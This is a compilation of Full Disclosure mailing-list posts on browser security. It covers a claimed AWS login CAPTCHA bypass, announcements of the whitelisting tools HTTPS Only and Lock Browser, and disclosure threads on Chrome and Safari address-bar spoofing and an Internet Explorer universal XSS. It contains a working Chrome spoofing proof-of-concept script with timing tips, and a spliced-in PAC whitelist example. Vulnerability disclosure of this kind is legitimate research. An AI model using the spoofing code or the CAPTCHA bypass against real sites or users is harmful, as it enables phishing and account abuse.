[FD] Request For Comment: Possible Flaw of Bypassing CAPTCHA in AWS Login?
The process of AWS login has a feature: if you use a "fresh" browser (no cookie, no cache, etc.) to sign in, and put the correct email and correct password there, a CAPTCHA is required ("To better protect your account, please re-enter your password and then enter the characters as they are shown in the image below"). And I accidentally noticed this feature can be easily bypassed:

MY SYSTEM
Knoppix 7.6.0 on Read-Only USB Stick - always "fresh" upon booting
Chromium 46 - not the latest
"US-WEST-2" EC2 Instance as proxy - always the same IP

MY STEPS
1. Use Chromium to visit https://console.aws.amazon.com/
2. Put correct email and correct password there, and sign in
3. CAPTCHA is required
4. Clear cookie, cache etc. in Chromium
5. Use Chromium under "Lock Browser" (lockbrowser.com) with "txt/https-whitelist.txt" configured as the following:
--
amazon.com
d3rrzw75sdtfe5.cloudfront.net
d3a94n0r6dqtjm.cloudfront.net
d2q66yyjeovezo.cloudfront.net
d3rn69q7afuxu6.cloudfront.net
d257l1zb7u5fh9.cloudfront.net
--
6. Visit https://console.aws.amazon.com/ ... it should be an ugly page because CSS etc. fails to load.
7. Put correct email and correct password there, and sign in
8. CAPTCHA is NOT required

ABOUT
I noticed this weird thing because I'm super lazy - don't add domains to the whitelist if it works. Later, I thought, "oops, CAPTCHA is gone". Of course, I contacted Amazon, and they said it's not a bug.

REQUEST FOR COMMENT
1. Can you reproduce this?
2. Is this thing a bug or not?

Kind Regards,

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Lock Browser 5.3 (Browser Security, Open Source, Python)
SUMMARY
This open source tool strictly controls what the web browser can access, which stops the web browser from loading harmful content - Phishing, Non-Secure HTTP, or whatever is not in your whitelist.

SITUATION
"Security flaws in Google Chrome, Microsoft Edge, and Apple Safari were all successfully exploited... browsers as well as Windows, OS X, and Flash"
http://venturebeat.com/2016/03/18/pwn2own-2016-chrome-edge-and-safari-hacked-460k-awarded-in-total/

ATTACK
Attacks have to make the target's browser load the attacker's website, which has two scenarios - send the link (phishing), or control a website that the target will visit. The latter is difficult because web servers are usually (not always) much more secure than web browsers, and attackers simply don't know which websites. The former, Phishing, is "mainstream", because it's a lot easier: the address of the email sender can be faked, the content of the email can look 100% legitimate and compelling, and the URL can hide behind a redirection service ("dereferer" of the email system, t.co, or whatever).

SOLUTION
Whitelist - for example, the whitelist contains Gmail, PayPal, Chase, GitHub, and Twitter. The attacker's website is not in the whitelist, so the harmful content does not reach the browser, even if some users are "stupid enough" to click links from The Phishing Guy.

URLs
Project Home Page: https://www.lockbrowser.com/
Source Code: https://www.lockbrowser.com/source/

HISTORY
It's a fork of HTTPS Only released in March: http://seclists.org/fulldisclosure/2016/Mar/77
And this is likely the last version - because the source code is so short and simple, maybe there is really no bug here! Let me hope so.

Kind Regards,
[FD] HTTPS Only 3.1 (Detailed Analysis, Browser Security, Open Source, Python)
To secure the browser, which is very fragile, the approach of HTTPS Only 3.1 is exceptionally simple:
1. Only HTTPS URLs (no other protocols)
2. Whitelist of domains (anything outside of the whitelist is blocked)

Now, let's look at threats:
1. Man in the middle - it's fixed.
2. Phishing always requires the browser to load the attacker's website, so it's permanently dead here.
3. Drive-by Download - dead (if applied strictly, unable to download the executable)
4. Clickjacking - dead (attacker's web page is unreachable)
5. Address Spoofing - dead too (just unable to load the fake content)
6. XSS - almost dead (for the attacker, the XSS vulnerability has to be GET, because POST requires the attacker's HTML)
7. CSRF - almost dead (for the attacker, the CSRF vulnerability has to be GET, and modern web applications simply don't do important things in GET, because it can be bookmarked etc., too dangerous)

URLs:
Project Home Page: https://www.httpsonly.net/
View Source Code: https://www.httpsonly.net/source/

Kind Regards,
[FD] Browser Security Tool: HTTPS Only 2.1 (Major Release, Open Source, Python)
When we browse the web, the top threats are:
1. Remote code execution - everything is lost
2. Man in the middle - sniffing, and tampering
3. Phishing - simple, old, and still quite useful
4. Cross site scripting - data of the vulnerable domain is lost
5. CSRF - unauthorized action

So, what if the browser can only access HTTPS of whitelisted domains? With HTTPS, "man in the middle" is fixed. And with the whitelist, other attacks become very difficult, some even become impossible (such as phishing). Phishing is a huge headache in this era, because URLs can be hidden in legitimate redirection (such as t.co).

That's why we made this simple tool (really simple - less than 200 lines of Python and JavaScript):
Project Home Page - https://www.httpsonly.net/
Source Code - https://github.com/httpsonly/httpsonly

Kind Regards,
[FD] Browser Security Tool: HTTPS Only (Why, How, Open Source, Python)
(@moderators The original post was too brief. This one has details.)

Summary
This tool completely locks the browser - just HTTPS, nothing else.
This tool is extremely simple - less than 100 lines of code (Python and JavaScript).

Why
Firefox Add-on Firesheep Brings Hacking to the Masses
http://www.pcworld.com/article/208727/Firesheep_Brings_Hacking_to_the_Masses.html
"Firesheep is basically a packet sniffer that can analyze all the unencrypted Web traffic"
(Quite a while ago, it's become a "casual game")

Yes, Mozilla said, "Gradually phasing out access to browser features for non-secure websites", in April 2015. After more than six months, they have done nothing useful.

The Chrome team wanted the same stuff:
https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure
Again, nothing significant has been achieved yet.

And there is HTTPS Everywhere, with SO MANY rules:
https://www.eff.org/https-everywhere/atlas/
It's still able to access HTTP by default, but there is "Block all HTTP requests". The problem: nothing happens when the browser tries HTTP - there should be a warning (it's incorrect behavior) and options (try HTTPS, Google Cache, etc.). People complained, months ago:
https://github.com/EFForg/https-everywhere/issues/1329

How
PAC (Proxy auto-config) is used:
If it's HTTPS, that's fine.
If it's HTTP, the user gets a warning and options (try HTTPS, Google Cache - it has HTTPS, etc.).
Anything else, it goes to 0.0.0.0

It's a simple tool that does one job, and does it very well.

URLs
https://httpsonly.github.io/
https://github.com/httpsonly/httpsonly

Best Wishes,
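As an added illustration (not the HTTPS Only or Lock Browser source code), here is a PAC file that implements the policy the posts describe: HTTPS to a whitelisted domain goes DIRECT, plain HTTP is steered to a local warning proxy, and everything else goes to 0.0.0.0. This covers both the PAC mechanism in this post and the domain whitelist of HTTPS Only 3.1 / Lock Browser above; the whitelist contents, the warning proxy address 127.0.0.1:8080 and the helper names are assumptions.

```javascript
// Added example, not the HTTPS Only / Lock Browser source: a PAC file that
// implements the policy described in the posts (HTTPS-only + domain whitelist).
// Assumptions (not from the posts): the whitelist contents below, a local
// proxy on 127.0.0.1:8080 that serves the warning/options page for HTTP,
// and the helper names. Browsers call FindProxyForURL(url, host) for each
// request and honour the returned proxy string.

// Constructed whitelist, one registrable domain per line (same idea as the
// "https-whitelist.txt" file). Subdomains of each entry are allowed too.
var WHITELIST_TEXT =
  "# comments and blank lines are ignored\n" +
  "amazon.com\n" +
  "github.com\n" +
  "paypal.com\n";

var BLACKHOLE = "PROXY 0.0.0.0:0";       // "anything else goes to 0.0.0.0"
var WARN_PROXY = "PROXY 127.0.0.1:8080"; // assumed local warning proxy

// Parse the whitelist text into a normalized array of domains.
function parseWhitelist(text) {
  var out = [];
  var lines = text.split(/\r?\n/);
  for (var i = 0; i < lines.length; i++) {
    var d = lines[i].trim().toLowerCase();
    if (d === "" || d.charAt(0) === "#") continue;
    // ".example.com" and "example.com" mean the same thing here
    if (d.charAt(0) === ".") d = d.substring(1);
    out.push(d);
  }
  return out;
}

var WHITELIST = parseWhitelist(WHITELIST_TEXT);

// Exact match or a proper subdomain. The label boundary is enforced, so
// "notgithub.com" does not match a whitelist entry "github.com".
function hostAllowed(host, whitelist) {
  host = host.toLowerCase().replace(/\.$/, ""); // drop a trailing dot
  for (var i = 0; i < whitelist.length; i++) {
    var d = whitelist[i];
    if (host === d) return true;
    if (host.length > d.length &&
        host.substring(host.length - d.length - 1) === "." + d) return true;
  }
  return false;
}

// The PAC host argument carries no scheme, so "https" vs "http" has to be
// read from the URL string itself.
function scheme(url) {
  var m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : "";
}

function FindProxyForURL(url, host) {
  var s = scheme(url);
  if (s === "https") {
    // HTTPS to a whitelisted domain goes out directly; anything else is black-holed.
    return hostAllowed(host, WHITELIST) ? "DIRECT" : BLACKHOLE;
  }
  if (s === "http") {
    // Plain HTTP never goes DIRECT: the local proxy shows the warning page
    // with options (try HTTPS, etc.) instead of silently failing.
    return WARN_PROXY;
  }
  // ftp:, ws:, or anything unknown
  return BLACKHOLE;
}
```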
[FD] Open source tool for applying Google Chrome security updates
The Problem
If you are a network administrator, keeping the browser updated is the first thing to do for security. Chrome is a very good browser, but it's a little bit complicated to answer this simple question: what is the version of the latest stable Chrome? And for people in places such as China (no Google services), updating Chrome is not an easy task.

The Solution
The official blog of Chrome Releases contains a lot of information. Code of this project extracts the version number from the official blog, downloads offline installers from the official website if it's a new version, and checks whether the visitor's Chrome is exactly the same.

Security
The best part of this project - users do not need to download and run software to be checked. This project does not even contain JavaScript.

URLs
Source Code https://github.com/windowschrome
Home Page http://www.windowschrome.com/
Latest Stable Chrome http://www.windowschrome.com/data/version.txt
[FD] Google Chrome Address Spoofing - Google's Opinion
It's public now:
https://code.google.com/p/chromium/issues/detail?id=497588

Interesting Points:

They did reproduce
"I can reproduce this locally"

They say it's DoS
"seems like any renderer denial-of-service"
(The browser does not crash!)

They say it's not a security issue
"remove security flags from this bug"

Finally, they stopped replying
"Jun 10" to "Jul 2"
(unbelievably huge delay)

In the end, they get it
"Lots of phishing attacks these days tell you to call a phone number"
"No interactions"

Currently, it's "Severity-Medium".

Kind Regards,

PS
http://dieyu.org/
Updated!
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
http://seclists.org/fulldisclosure/2015/Jun/109
Big Whale said:
"Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works"
"clearly URL spoofing"
Thanks for testing!

http://seclists.org/oss-sec/2015/q3/0
0pc0deFR said:
"Work on Google Chrome Ubuntu"
Bonjour, thanks for testing!

http://seclists.org/oss-sec/2015/q2/824
Daniel Micay said:
"It does display a window with the oracle.com address"
"why you've got an ever increasing number of setTimeout events"
http://seclists.org/oss-sec/2015/q2/823
Alexander E. Patrakov said:
"Looks like a fork bomb"
Thanks for testing! The number of "setTimeout" does NOT need to be increasing forever. OK, I admit - we are lazy (it works and we don't touch it anymore) :-)

http://seclists.org/oss-sec/2015/q3/2
Roney Gomes said:
"it worked on the desktop version of Opera"
Wow! Thanks for letting us know.
Here is the screenshot of Opera
http://www.deusen.co.uk/items/gwhere.6128645971389012/OperaScreenshot.png
And Chrome
http://www.deusen.co.uk/items/gwhere.6128645971389012/ChromeScreenshot.png
(A number is displayed in Chrome's address bar, not the same as Opera)

http://seclists.org/oss-sec/2015/q2/826
Daniel Micay said:
"it can't always be replicated"
"I've tried it a few times and"
"it fails about as often as it works"
http://seclists.org/oss-sec/2015/q3/4
Valentinas Bakaitis said:
"PoC did not work"
Hey! The trick here is timing: Please modify those numbers in the code - make them smaller.

http://seclists.org/oss-sec/2015/q3/5
Zak Siddiqui said:
"Is it reproducible with HTTPS?"
Yes, we just tried this URL
https://en.wikipedia.org/wiki/Main_Page
It works. In fact, it works BETTER against HTTPS, because HTTPS is slower, so timing is easier.

http://seclists.org/oss-sec/2015/q2/825
Florian Weimer said:
"they show the new URL while still displaying old content"
Exactly, that's the cause of this bug.

In the end, allow me to repeat:
No user interaction on the fake page.
But, anyone can do "BBB Accredited Business" "PayPal Partner" etc.
Kind Regards,

PS
We love clever tricks. We love this: http://dieyu.org/

On 2015/6/30 7:08, David Leo wrote:

Impact:
The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)

Note:
No user interaction on the fake page.

Code:

* index.html

    function next()
    {
        w.location.replace('http://www.oracle.com/index.html?'+n);n++;
        setTimeout("next();",15);
        setTimeout("next();",25);
    }
    function f()
    {
        w=window.open("content.html","_blank","width=500 height=500");
        i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
    }
    Go

* content.html

    This web page is NOT oracle.com
    location="http://www.oracle.com/index.html";

* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)

Request For Comment:
We reported this to Google. They reproduced, and say it's DoS which doesn't matter.
We think it's very strange, since the browser does not crash (not DoS), and the threat is obvious.
What's your opinion?

Kind Regards,

PS
We love clever tricks. We love this: http://dieyu.org/
[FD] Google Chrome Address Spoofing (Request For Comment)
Impact:
The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)

Note:
No user interaction on the fake page.

Code:

* index.html

    function next()
    {
        w.location.replace('http://www.oracle.com/index.html?'+n);n++;
        setTimeout("next();",15);
        setTimeout("next();",25);
    }
    function f()
    {
        w=window.open("content.html","_blank","width=500 height=500");
        i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
    }
    Go

* content.html

    This web page is NOT oracle.com
    location="http://www.oracle.com/index.html";

* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)

Request For Comment:
We reported this to Google. They reproduced, and say it's DoS which doesn't matter.
We think it's very strange, since the browser does not crash (not DoS), and the threat is obvious.
What's your opinion?

Kind Regards,

PS
We love clever tricks. We love this: http://dieyu.org/
Re: [FD] Safari Address Spoofing (How We Got It)
Great blog, Michal!

If you change "http://1.2.3.4/" in your Safari code to some URL in the real world (for example, dailymail.co.uk), your code won't work (the page of the target domain is simply loaded).

The trick here is: "keep trying to load".

Kind Regards,
__
BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

On 2015/5/31 23:09, Michal Zalewski wrote:
Well...
http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html

On Thu, May 28, 2015 at 10:47 PM, David Leo wrote:
Proof of concept:
http://www.deusen.co.uk/items/iwhere.9500182225526788/
It works on fully patched versions of iOS and OS X.

How it works:
Just keep trying to load the web page of the target domain.

How We Got It:
Safari changes the address bar to the new URL BEFORE the new content is loaded.

BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Kind Regards,
[FD] Safari Address Spoofing (How We Got It)
Proof of concept:
http://www.deusen.co.uk/items/iwhere.9500182225526788/
It works on fully patched versions of iOS and OS X.

How it works:
Just keep trying to load the web page of the target domain.

How We Got It:
Safari changes the address bar to the new URL BEFORE the new content is loaded.

BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Kind Regards,
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
'could you share the contents of "1.php"?'
Sure:
http://www.dailymail.co.uk/robots.txt";); ?>

"I'm assuming it is a delayed re-direct to the target's domain?"
Exactly. :-)

"the cloudflare scripts"
It's been tested without them.

Kind Regards,

On 2015/2/6 2:31, Barkley, Peter wrote:
Thanks Zaakiy, I'm able to get the hacked page on IE9 after changing the document mode from Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around having to manually switch the document mode with the appropriate DOCTYPE set in the exploit html page.

David, could you share the contents of "1.php"? I'm assuming it is a delayed re-direct to the target's domain? I am unable to reproduce the exploit locally with the same code (assuming my 1.php is correct), though without the cloudflare scripts.

Thanks,
Peter

Peter Barkley | Senior Security Intelligence Analyst | Security Operations Centre | Royal Bank of Canada

-----Original Message-----
From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of Zaakiy Siddiqui
Sent: 2015, February, 04 6:46 PM
To: David Leo; Joey Fowler
Cc: fulldisclosure@seclists.org; b...@securitytracker.com; bugt...@securityfocus.com; cve-ass...@mitre.org
Subject: Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Hi David,

Nice one... great find! And thanks Joey for confirming the bypass of HTTP-to-HTTPS restrictions.

I can confirm that this also affects Spartan Browser (Experimental enabled in about:flags in Internet Explorer 11). I can also confirm that IE 10 is affected. IE 9 appears to not be vulnerable. Screenshots below.
Regards,
Zaakiy Siddiqui

IE 11 Spartan - vulnerable (Windows 10)
IE 10 - vulnerable (Windows 7)
IE 9 - not vulnerable (Windows 7)

From: David Leo
Sent: Wednesday, 4 February 2015 11:13 PM
To: Joey Fowler
Cc: bugt...@securityfocus.com, fulldisclosure@seclists.org, b...@securitytracker.com, cve-ass...@mitre.org

Microsoft was notified on Oct 13, 2014.
Joey thank you very much for your words.

Kind Regards,

On 2015/2/3 4:53, Joey Fowler wrote:
Hi David,

"nice" is an understatement here. I've done some testing with this one and, while there /are/ quirks, it most definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.

As long as the page(s) being framed don't contain X-Frame-Options headers (with `deny` or `same-origin` values), it executes successfully. Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is).

It looks like, through this method, all viable XSS tactics are open!

Nice find! Has this been reported to Microsoft outside (or within) this thread?

--
Joey Fowler
Senior Security Engineer, Tumblr

On Sat, Jan 31, 2015 at 9:18 AM, David Leo wrote:
Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by an external domain.

How To Use
1. Close the popup window ("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting (XSS)
Impact: Same Origin Policy (SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply "nice".

Kind Regards,
[FD] Very Important Info About "Major Internet Explorer Vulnerability - NOT Patched"
1. "Spartan - vulnerable (Windows 10)"
http://www.deusen.co.uk/items/insider3show.3362009741042107/SpartanWin10_screenshot.png
Thanks to Zaakiy Siddiqui!

2. http://www.dailymail.co.uk/robots.txt";); ?>
Many asked for it.

3. It's Universal XSS, as we tested:
Not only dailymail.co.uk - also Yahoo etc.
Not only injecting content - also getting private info etc.

Kind Regards,
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
"is this entirely an IE flaw" Yes. "is it tied to the use of Cloudflare" No. "I tried to reproduce... was unsuccessful" Likely, this detail is missing: http://www.dailymail.co.uk/robots.txt";); ?> Please tell us whether you reproduce(with the PHP code). "am I correct... JavaScript hosted on shared domains" In the demo, it's first injected into page without any JavaScript. (robots.txt) "I don't have time to to a teardown on CloudFlare.JS" Honestly we don't even know such file exists :-) We uploaded and took a screenshot - that's all. "it's a very impressive exploit" Thanks. 'make sure the label "universal" is actually justified' It has also been tested against Yahoo etc. "Sorry if this has already been discussed elsewhere" Many asked - for example: http://www.milw00rm.com/exploits/7057 Again, please tell us whether you reproduce with the PHP code. Kind Regards, On 2015/2/5 3:29, Ben Lincoln (F7EFC8C9 - FD) wrote: So here's a possibly stupid question: is this entirely an IE flaw, or is it tied to the use of Cloudflare by the targeted site as well as the attacking site? I ask because: 1 - I tried to reproduce the attack in a number of ways without using CloudFlare, and was unsuccessful. 2 - Since I don't have access to a CloudFlare account, I used Burp to do a find/replace for proxied response headers and bodies on "www.dailymail.co.uk" and then "dailymail.co.uk" with a target domain which does not use Cloudflare, then accessed the Deusen demo page. The injection attempt failed. 3 - I then used Burp in the same way, but replaced "www.dailymail.co.uk"/"dailymail.co.uk" with a target domain which *does* use CloudFlare, and the injection attempt succeeded. 
If this is true, am I correct in thinking that while this definitely involves a vulnerability in IE, it also depends at least on targeting website owners who use JavaScript hosted on shared domains (CloudFlare, in this case), which is inherently riskier than hosting it all on one's own domain due to the way cross-domain security works in modern browsers? I don't have time to to a teardown on CloudFlare.JS, but does this also depend on some sort of code vulnerability in that file? Even if one or both of those caveats are true, it's a very impressive exploit, but I'd like to make sure the label "universal" is actually justified. Sorry if this has already been discussed elsewhere. I couldn't find anything when I looked. - Ben On 2015-02-02 12:53, Joey Fowler wrote: Hi David, "nice" is an understatement here. I've done some testing with this one and, while there *are* quirks, it most definitely works. It even bypasses standard HTTP-to-HTTPS restrictions. As long as the page(s) being framed don't contain X-Frame-Options headers (with `deny` or `same-origin` values), it executes successfully. Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is). It looks like, through this method, all viable XSS tactics are open! Nice find! Has this been reported to Microsoft outside (or within) this thread? -- Joey Fowler Senior Security Engineer, Tumblr On Sat, Jan 31, 2015 at 9:18 AM, David Leo wrote: Deusen just published code and description here: http://www.deusen.co.uk/items/insider3show.3362009741042107/ which demonstrates the serious security issue. Summary An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by external domain. How To Use 1. Close the popup window("confirm" dialog) after three seconds. 2. Click "Go". 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk. 
Technical Details Vulnerability: Universal Cross Site Scripting(XSS) Impact: Same Origin Policy(SOP) is completely bypassed Attack: Attackers can steal anything from another domain, and inject anything into another domain Tested: Jan/29/2015 Internet Explorer 11 Windows 7 If you like it, please reply "nice". Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
Microsoft was notified on Oct 13, 2014.
Joey thank you very much for your words.

Kind Regards,

On 2015/2/3 4:53, Joey Fowler wrote:
Hi David,

"nice" is an understatement here. I've done some testing with this one and, while there /are/ quirks, it most definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.

As long as the page(s) being framed don't contain X-Frame-Options headers (with `deny` or `same-origin` values), it executes successfully. Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is).

It looks like, through this method, all viable XSS tactics are open!

Nice find! Has this been reported to Microsoft outside (or within) this thread?

--
Joey Fowler
Senior Security Engineer, Tumblr

On Sat, Jan 31, 2015 at 9:18 AM, David Leo wrote:
Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by an external domain.

How To Use
1. Close the popup window ("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting (XSS)
Impact: Same Origin Policy (SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply "nice".

Kind Regards,
[FD] Major Internet Explorer Vulnerability - NOT Patched
Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by an external domain.

How To Use
1. Close the popup window ("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting (XSS)
Impact: Same Origin Policy (SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply "nice".

Kind Regards,